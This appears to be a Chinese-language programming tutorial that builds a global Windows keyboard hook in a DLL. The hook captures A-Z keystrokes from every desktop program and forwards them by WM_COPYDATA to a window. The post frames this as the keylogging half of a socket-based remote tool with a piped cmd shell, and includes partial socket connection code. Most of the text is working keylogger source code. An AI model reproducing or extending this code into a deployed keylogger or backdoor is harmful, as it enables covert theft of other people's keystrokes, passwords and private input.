鍵盤鉤子

HOOK 鉤子

HHOOK SetWindowsHookEx(  int idHook,        // hook type  HOOKPROC lpfn,     // hook procedure  HINSTANCE hMod,    // handle to application instance  DWORD dwThreadId   // thread identifier);

鍵盤鉤子

WH_KEYBOARD

鉤全局/鉤本地

鉤子鏈,誰最后下鉤子,誰最先被調用

void CHOOKMFCDlg::OnBnClickedHook(){    // TODO:  在此添加控件通知處理程序代碼        g_hhk = SetWindowsHookEx(WH_KEYBOARD,   //鉤子類型        (HOOKPROC)KeyboardProc, //回調函數        NULL,   //表示第三方注入的DLL,全局鉤子使用        GetCurrentThreadId()    //線程id,0表示鉤所有桌面程序        );    if (g_hhk == NULL)    {        AfxMessageBox(_T("下鉤子失敗"));        return;    }    //否則就成功}

HHOOK g_hhk;//鍵盤鉤子回調函數LRESULT CALLBACK KeyboardProc(int code,       // hook code    WPARAM wParam,  // virtual-key code    LPARAM lParam   // keystroke-message information    ){    //調試輸出工具,輸出調試字符串    //寫日志    OutputDebugStringA("keyboard pressed!");    //調用下一個鉤子    return CallNextHookEx(g_hhk, code, wParam, lParam);}

這里我按一下但是會顯示兩次,因為鍵盤按下和彈起是兩個動作

全局鉤子需要一個DLL(動態鏈接庫),程序依賴庫,庫提供了某些函數,我們需要編寫一個dll,將hook函數放在dll中,然后讓操作系統去使用該dll,讓其鉤住其他進程得鍵盤消息。
exe(調用鉤子函數) + Dll(編寫鉤子函數)

DLL

// dllmain.cpp : 定義 DLL 應用程序的入口點。#include "stdafx.h"#include <stdio.h>//提供鉤子回調函數HHOOK g_hhk;HMODULE g_hModule;//鍵盤鉤子回調函數LRESULT CALLBACK KeyboardProc(int code,       // hook code    WPARAM wParam,  // virtual-key code    LPARAM lParam   // keystroke-message information    ){    //調試輸出工具,輸出調試字符串    //寫日志    //OutputDebugStringA("keyboard pressed!");    //虛擬鍵 我們鍵盤在我們windows中用一些宏來表示    unsigned int nVKCode = wParam;    //表示按了a-z    char szBuf[256] = { 0 };    if (nVKCode >= 'A' && nVKCode <= 'Z'){        sprintf_s(szBuf, "%c pressed", nVKCode);        OutputDebugStringA(szBuf);    }    //調用下一個鉤子    return CallNextHookEx(g_hhk, code, wParam, lParam);}//dll導出函數,提供給其他程序使用BOOL MySetHook(){    g_hhk = SetWindowsHookEx(WH_KEYBOARD,   //鉤子類型        (HOOKPROC)KeyboardProc, //回調函數        g_hModule,  //表示第三方注入的DLL,全局鉤子使用,dll的模塊句柄        0   //線程id,0表示鉤所有桌面程序        );    if (g_hhk == NULL){        return FALSE;    }    return TRUE;}BOOL APIENTRY DllMain( HMODULE hModule,                       DWORD  ul_reason_for_call,                       LPVOID lpReserved                     ){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:    {        //當dll被加載時調用        //編寫初始化操作         g_hModule = hModule;    }        break;    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:    {        //當dll被釋放時候調用        //編寫反初始化操作    }        break;    }    return TRUE;}

服務端—socket—-客戶端
1.cmd功能<---管道----cmd 2.鍵盤記錄<--- ----dll(keyboard hook) 最簡單的進程通信:發送消息WM_COPYDATA 這里我們創建一個win32項目 function.h

#pragma once//創建socketint insocket();

function.cpp

#include "stdafx.h"#include "function.h"#include <winSock2.h>#include <windows.h>#pragma comment(lib,"ws2_32.lib")SOCKET s;int insocket(){    //初始化    WORD wVersionRequested;    WSADATA wsaData;    int err;    wVersionRequested = MAKEWORD(2, 2);    err = WSAStartup(wVersionRequested, &wsaData);    if (err != 0) {        return 0;    }    //創建套字節    s = socket(AF_INET, SOCK_STREAM        , 0);    if (INVALID_SOCKET == s)    {        return 0;    }    // 綁定套字節      sockaddr_in soadder;    soadder.sin_family = AF_INET;    soadder.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");    soadder.sin_port = htons(10087);    int len = sizeof(sockaddr_in);    return 1;}

創建一個函數insocket()用來創建socket
然后在win32項目寫入連接

    int nRte = insocket();    if (nRte == 0)    {        OutputDebugStringA("error");        return 0;    }    //connent    sockaddr_in soadder = { 0 };    soadder.sin_family = AF_INET;    int len = sizeof(sockaddr_in);    soadder.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");    soadder.sin_port = htons(10087);    nRte = connect(s, (sockaddr*)&soadder, len);    if (SOCKET_ERROR == nRte)    {        return 0;    }

創建全局句柄用來獲取win32句柄給dll使用,因為dll里面獲取鍵盤內容要發送給客戶端所以要獲取客戶端句柄

 g_hWnd = hWnd;    BOOL bRet = MySetHook(g_hWnd);   if (!bRet){       OutputDebugStringA("set hook error");       return 0;   }

然后在回調函數里面進行處理

case WM_COPYDATA:    {        //表示我們dll發送的數據,我們在這里接受并處理        PCOPYDATASTRUCT pcds = (PCOPYDATASTRUCT)lParam;        OutputDebugStringA((LPCSTR)pcds->lpData);    }

然后是dll代碼

// dllmain.cpp : 定義 DLL 應用程序的入口點。#include "stdafx.h"#include <stdio.h>//提供鉤子回調函數HHOOK g_hhk;HMODULE g_hModule;HWND g_hWnd;//鍵盤鉤子回調函數LRESULT CALLBACK KeyboardProc(int code,       // hook code    WPARAM wParam,  // virtual-key code    LPARAM lParam   // keystroke-message information    ){    //調試輸出工具,輸出調試字符串    //寫日志    //OutputDebugStringA("keyboard pressed!");    //虛擬鍵 我們鍵盤在我們windows中用一些宏來表示    unsigned int nVKCode = wParam;    //表示按了a-z    char szBuf[256] = { 0 };    if (nVKCode >= 'A' && nVKCode <= 'Z'){        sprintf_s(szBuf, "%c pressed", nVKCode);        //OutputDebugStringA(szBuf);        //改成向我們主窗口發送我們的鍵盤消息,WM_DATACOPY消息        COPYDATASTRUCT cds;        cds.dwData = 0;        cds.cbData =strlen(szBuf)+1;    //表示數據的長度        cds.lpData = szBuf; //表示數據        SendMessage(g_hWnd, //向目標窗口發送消息                     WM_COPYDATA,                    (WPARAM)g_hWnd,     //表示當前自己的窗口句柄,可以不寫                    (LPARAM)&cds    //構建一個結構體用于將數據傳輸                    );    }    //調用下一個鉤子    return CallNextHookEx(g_hhk, code, wParam, lParam);}//dll導出函數,提供給其他程序使用BOOL MySetHook(HWND hWnd){    g_hWnd = hWnd;    g_hhk = SetWindowsHookEx(WH_KEYBOARD,   //鉤子類型        (HOOKPROC)KeyboardProc, //回調函數        g_hModule,  //表示第三方注入的DLL,全局鉤子使用,dll的模塊句柄        0   //線程id,0表示鉤所有桌面程序        );    if (g_hhk == NULL){        return FALSE;    }    return TRUE;}BOOL APIENTRY DllMain( HMODULE hModule,                       DWORD  ul_reason_for_call,                       LPVOID lpReserved                     ){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:    {        //當dll被加載時調用        //編寫初始化操作         g_hModule = hModule;    }        break;    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:    {        //當dll被釋放時候調用        //編寫反初始化操作    }        break;    }    return TRUE;}